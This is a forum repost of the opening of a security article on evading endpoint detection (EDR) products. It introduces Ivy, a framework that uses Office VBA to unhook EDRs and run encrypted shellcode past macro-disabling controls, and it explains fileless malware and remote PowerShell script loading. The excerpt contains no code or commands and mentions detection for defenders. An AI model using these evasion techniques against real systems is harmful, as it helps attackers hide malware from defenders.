Defeating EDRs with Office Products

Andy Ful

From Hard_Configurator Tools
Thread author
Top poster
Dec 23, 2014
Defeating EDRs with Office Products
Matthew Eidelberg

This thread is also related to another MT thread:

Defeating EDRs with Office Products​


Removing an EDR's hooks from a process is not a foreign concept these days; it’s become a common technique deployed by adversaries to remain undetected while circumventing anti-malware controls. Defenders have tried to combat these attacks but ultimately fall short as most of the effort rests on ensuring that malicious executables can’t run on endpoints (typically through whitelisting or other access control lists). This technique, combined with intensive logging, is often deployed to detect these attacks, preventing any further actions, and stopping the attack chain.

Unfortunately, adversaries are constantly adapting to defensive controls by inventing novel approaches to perform these techniques. As EDR products started augmenting their detection controls with Event Tracing for Windows (ETW), adversaries started tampering with these functions to prevent ETW events from being generated. When it comes to circumventing access controls, adversaries often rely on trusted applications or fileless attacks. These types of attacks are harder to stop or detect because they use legitimate applications to execute malicious actions.

This article will cover topics like the effectiveness of fileless attacks, including their use cases. We’ll also discuss Ivy, a new payload creation framework that utilizes Microsoft's Office VBA environment to programmatically unhook EDRs from processes. The framework then loads, decrypts and executes shellcode while remaining undetected by standard signature-based rules for Visual Basic for Applications (VBA) macro attacks. Ivy techniques are all fileless-based attacks that rely on VBA code (like typical Office macro payloads), however, these are not hampered by the deployment of the security control "Disable Macro Functions" built into Office products. Throughout this article, we’ll discuss the inner workings of the techniques in detail, as well as what defenders can do to help detect these types of attacks inside their networks.​

Fileless Malware​

When we talk about fileless malware, which has come and gone over the years, there is often a misunderstanding of what that means. Fileless malware techniques often utilize legitimate processes to load code or scripting functions to perform malicious activities such as executing shellcode inside the context of said legitimate process's memory. As a result, there are next to zero artifacts to detect and investigate. Modern sophisticated adversaries use these types of attacks not only to circumvent any anti-malware controls such as EDRs, but also to evade access controls like whitelisting mechanisms.

The most notable example of fileless malware is the PowerShell scripting attack. For a long period of time, this was used by adversaries as a way of executing malicious code on an endpoint without detection or leaving artifacts on disk. This is mainly a result of PowerShell’s ability to import PowerShell scripts into memory from a remote location, such as a website hosting the script (e.g., an HTTP request). Once loaded, the module is called and the script will run, executing malicious code in the context of that PowerShell process’s memory.​


Figure 1: PowerShell Fileless Scripted Delivery Walkthrough


The full article:
Last edited: